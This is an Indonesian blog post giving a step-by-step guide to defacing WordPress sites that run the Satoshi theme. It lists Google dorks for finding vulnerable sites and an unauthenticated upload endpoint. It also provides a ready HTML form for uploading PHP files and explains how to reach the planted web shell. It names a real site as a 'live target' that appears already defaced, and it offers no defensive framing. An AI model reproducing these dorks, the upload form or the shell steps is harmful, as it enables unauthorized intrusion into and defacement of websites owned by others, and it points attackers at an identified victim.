Deface Wordpress Satoshi Theme
Assalamualaikum wr wb
Deface Wordpress Satoshi Theme Vulnrebility Upload With Csrf
Ekstensi yg bisa di upload:html,php
================================================
dork inurl:/wp-content/themes/satoshi/
intext:Design By Voosh Themes
inurl:/wp-content/themes/satoshi/
intext:Design By TecnoGe Informatica
(Kembangin Supaya Dapet Yg Fresh)
================================================
Exploit: site.com/wp-content/themes/satoshi/upload-file.php
================================================
Csrf:
<form enctype="multipart/form-data"
action="http://target.com/wp-content/themes/satoshi/upload-file.php" method="post">
Your File: <input name="uploadfile" type="file" /><br />
<input type="submit" value="upload" />
</form>
(Save Ekstensi Html)
================================================
Langkah-Langkah:
1.Dorking Di google
2.Pilih Website lalu masukan Exploitnya contoh https://www.site.com/wp-content/themes/satoshi/upload-file.php
(Jika Tampilan Blank/Kosong biasanya Vuln)
3.Masuk Ke Csrf Yg Udah Lu Siapakan
Jika berhasil upload maka ada tulisan succes seperti di bawah
4. Cara manggil Shellnya
path http://target.com/wp-content/themes/satoshi/images/shell.php
Live Target: http://wordsmyth.se/wp-content/themes/satoshi/images/ha.html
Belum ada Komentar untuk "Deface Wordpress Satoshi Theme "
Posting Komentar